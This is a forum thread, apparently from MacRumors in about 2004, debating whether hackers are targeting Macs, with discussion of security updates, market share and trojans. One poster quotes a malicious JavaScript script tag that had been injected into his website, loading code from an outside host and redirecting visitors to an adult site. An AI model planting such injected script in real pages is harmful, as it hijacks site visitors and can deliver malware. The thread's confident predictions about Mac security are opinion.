Are Hackers Now Gunning for the Mac?


quagmire

macrumors 603
Apr 19, 2004
6,255
1,063
Not at all. That means apple found many holes and fixed it before they were exploited by hackers. It doesn't mean at all hackers are gunning for the mac.
 

Mr. Anderson

Moderator emeritus
Nov 1, 2001
22,407
0
VA
But the sad reality of it is that the more popular Apple becomes, the bigger target it is.

If anyone figured out how to foobar the firm ware on an iPod it would be a very sad day....

It is a bit reassuring to get regular security updates from Apple proving that they're at least try to stay ahead of the game. :D

D
 

Dr. Dastardly

macrumors 65816
Jun 26, 2004
1,317
0
I live in a giant bucket!
Mr. Anderson said:
But the sad reality of it is that the more popular Apple becomes, the bigger target it is.

If anyone figured out how to foobar the firm ware on an iPod it would be a very sad day....

It is a bit reassuring to get regular security updates from Apple proving that they're at least try to stay ahead of the game. :D

D
Its kind of a catch 22 with Apple. People want Apple to gain more in the market share but if they do it will attract more viruses and hackers. And then they will complain about that!

I'll take the small market share over viruses anyday.
 

Analog Kid

macrumors 601
Mar 4, 2003
4,777
2,797
What a dumb, pointless, shallow article... Anyone out there learn anything? Didn't think so...
 

Keynoteuser

macrumors regular
Jul 7, 2003
149
0
Columbus, Ohio area
what writers like this forget

OS X is not built on an OS that's full of holes going back years and years. Yes the underlying system is old, but it's not full of back doors and holes. The benefit is, even if someone makes a virus for OS X, it'll have a hard time spreading on its own, and I doubt you'll EVER see a hole in OS X large enough for someone to take over your machine without you ever doing anything but connecting to the net, which seems to be the case with Windows now. I can't imagine being an uninformed Windows users these days. They say it takes 20 min for a new Windows machine to be taken over from the time it is first connected to the net. Yikes.
 

quagmire

macrumors 603
Apr 19, 2004
6,255
1,063
Essefgy said:
Don't get too smug guys.

I just spent two days tracking down a Trojan Horse on my G5.
You can still have a virus in your G5 as we speak. But, it won't effect it since it is not compatible with Macs. I can have 1 billion spyware, viruses, and trojans on my pbook but, won't effect it since the stuff works on Windows only.
 

macnulty

macrumors 6502
May 18, 2003
496
0
Rehoboth Beach, De
Not much learned. If I'm not mistaken the printer/password vulnerability was found by a third party in Scandinavia or whoville and was credited, like many others, for finding it. MS anyone. Many of the vulnerabilities are not inherent in OSX because the system requires admin approval to make system changes.
 

yamabushi

macrumors 65816
Oct 6, 2003
1,009
0
So, in the worst case Mac users may have to install antivirus software in the future to actually protect their own computer rather than to just prevent the spread of viruses to other computers? Oh well.
 

Abstract

macrumors Penryn
Dec 27, 2002
24,378
110
Location Location Location
Dr. Dastardly said:
Its kind of a catch 22 with Apple. People want Apple to gain more in the market share but if they do it will attract more viruses and hackers. And then they will complain about that!

I'll take the small market share over viruses anyday.
I have never understood the desire for Apple to increase their small market share. I hope they stay small forever. Sorry, I know it's selfish, but the only benefit of Apple being bigger is Steve Jobs' paycheck, and I personally don't care about that.
 

paxtonandrew

macrumors 6502
May 10, 2004
323
0
I Come From A Land Down Under
Abstract said:
I have never understood the desire for Apple to increase their small market share. I hope they stay small forever. Sorry, I know it's selfish, but the only benefit of Apple being bigger is Steve Jobs' paycheck, and I personally don't care about that.
Not quite true, Steve only gets paid $1, as he says, to receive health benefits, needless of the company doing good or bad, he makes all of his money through stock options, and this week, he will be laughing all the way to the bank.

Guinnes World Records said:
Lowest Paid Chief Executive Officer
Some lucky guys get to turn their hobby into a job. Steve Jobs has always lived and breathed computers, and now they're making him very rich. OK, so he might only get a measly $1 a year, but with a luxury Gulfstream jet and 10 million lucrative share options to his name, he's unlikely to ever go begging.
 

Mr. Anderson

Moderator emeritus
Nov 1, 2001
22,407
0
VA
Essefgy said:
Don't get too smug guys.

I just spent two days tracking down a Trojan Horse on my G5.
And how did you know it was on there?

The one thing that might be a concern is fast user switching and not having a password on the accounts so you can just hit a button and not log in everytime. I tried that for a day and then put the passwords back on, not wanting to leave my machine open like that.

I'm sure there are plenty of people out there who don't use passwords, though.

D
 

Keynoteuser

macrumors regular
Jul 7, 2003
149
0
Columbus, Ohio area
only one I know of

There's only ONE trojan horse I know of, and it has to be installed manually, and it shows up in the startup items list, and can even be searched for by name, so it's not ANYTHING like the stuff on the PC that is burried deep in the registry files.
 

pourhadi

macrumors member
Jan 27, 2003
67
0
And let's not forget that a virus for UNIX may even be ineffective on the Mac - Mac viruses may even have to exploit holes in Apple's closed code, such as Aqua, and that's not going to be as easy for the hackers as exploiting a UNIX vulnerability.
 

eric_n_dfw

macrumors 68000
Jan 2, 2002
1,507
55
DFW, TX, USA
Open source

What they also failed to mention is the fact that the Darwin kernel is open sourced and many of the pieces that actually get the updates (OpenSSH, CUPS printing, etc) are ports from the opensource BSD community (which are often the same source code as their Linux versions). Apple and that community are mutually benefited when either one finds and fixes such exploits as the fixes are propogated to both code bases.

BSD is well known for security (especially OpenBSD) as well.

If you are a Linux or BSD user, you often see the same security updates for those distributions right before Apple's update.
 

space2go

macrumors regular
Feb 5, 2004
162
0
pourhadi said:
And let's not forget that a virus for UNIX may even be ineffective on the Mac - Mac viruses may even have to exploit holes in Apple's closed code, such as Aqua, and that's not going to be as easy for the hackers as exploiting a UNIX vulnerability.
Especially as Windoze shows again and again how terribly hard it is to exploit a weakness in closed code.
 

Essefgy

macrumors member
Dec 3, 2003
80
0
SEMI
Vonnie said:
What was it called? Link to information?
This is what Virex said. The files were in my Safari cache.

Found the Exploit-ByteVerify trojan !!!
Found the Exploit-ObjectData trojan !!!
Found the Exploit-MhtRedir.gen trojan !!!

As can be expected, they did not affect my Mac; but I still feel bad about passing them on.
 

Essefgy

macrumors member
Dec 3, 2003
80
0
SEMI
Mr. Anderson said:
And how did you know it was on there?
My personal website had been hacked. While during research I read somewhere how Macs are not susceptible to virus, but they can still get trojans. Feeling paranoid I did a Virex search and found it. I deleted six instances, and the website hack ceased. I guess I was hacking my own site.

Incidentally, the hack was that the following link was being added to all my pages

Code:
<script language="JavaScript” src="http://www.wizardsworldwide.com/chat/chat/localization/czech/catalog/spacer.gif?i=0c2a602a840a150cb337e2406913b775&to=http://www.f**klynx.com/lynx/Boobs/bigtits.html"></script>
P.S. Yes, I am a newbie.
 

wdlove

macrumors P6
Oct 20, 2002
16,570
0
Essefgy said:
Don't get too smug guys.

I just spent two days tracking down a Trojan Horse on my G5.
Did you have virus software installed on you Mac? I do just for safety sake.
 

Essefgy

macrumors member
Dec 3, 2003
80
0
SEMI
I had Virex from .Mac, but I did not have the latest definitions (since corrected). I have Little Snitch running on my desktop but not on my PowerBook, so maybe my laptop was the instigator. Needless to say, I've got Little Snitch on both now. I even got Allume's Internet Cleanup for good measure.
 

nagromme

macrumors G5
May 2, 2002
12,551
1,186
Some things are obvious:

1. Macs are more secure by design.

2. Macs are smaller targets.

BOTH those things help your data and your privacy stay secure. BOTH are good things.

But Macs already ARE a target--some high-profile targets (like the US Army web sites) use them, and crackers are tempted by the prestige of tackling a tough OS. And yet we still have no viruses.

One day we will. But we will NEVER have REMOTELY the problem of Windows. People talk as though tripling Mac market share from 5% to 15% or whatever would suddenly make Macs as vulnerable as Windows. Not so: both points above are still true.


It's nice to say "we have no viruses" while it lasts. But it's also going to be very comforting when all we can say is "we have ALMOST no viruses compared to Windows." That's still going to make me a lot happier to keep my data on a Mac.

(Re Trojan horses, a Trojan is convincing someone that one thing is another. It's one person lying to another--like an app creator saying "run my program, it does something good" when in fact it does harm, probably concealed. No OS can stop people lying to each other. All you can do is throw up a warning when installing something, but if the user trusts the source, they'll confirm the warning. No OS is secure against something the user WANTS to do, even if they are wrong to want it.)
 

Vonnie

macrumors regular
Apr 13, 2003
138
0
Essefgy said:
This is what Virex said. The files were in my Safari cache.

Found the Exploit-ByteVerify trojan !!!
Found the Exploit-ObjectData trojan !!!
Found the Exploit-MhtRedir.gen trojan !!!

As can be expected, they did not affect my Mac; but I still feel bad about passing them on.
How would you be passing them on? Do you mail your Safari cache to your friends? :)

I think Virex just scared you for no good reason (or because they want you to feel your money was well spent on virex).

You need IE for windows to be actually infected by those trojans. So your machine was never in real danger.

The safari cache files are a mix of binary data and html. To actually infect any other windows user, you would have to remove the binary data first yourself. (otherwise the windows user wouldn't be able to open it). Then you need to put the cleaned up html files on your website, mail it to your windows friends, or put them on a network share.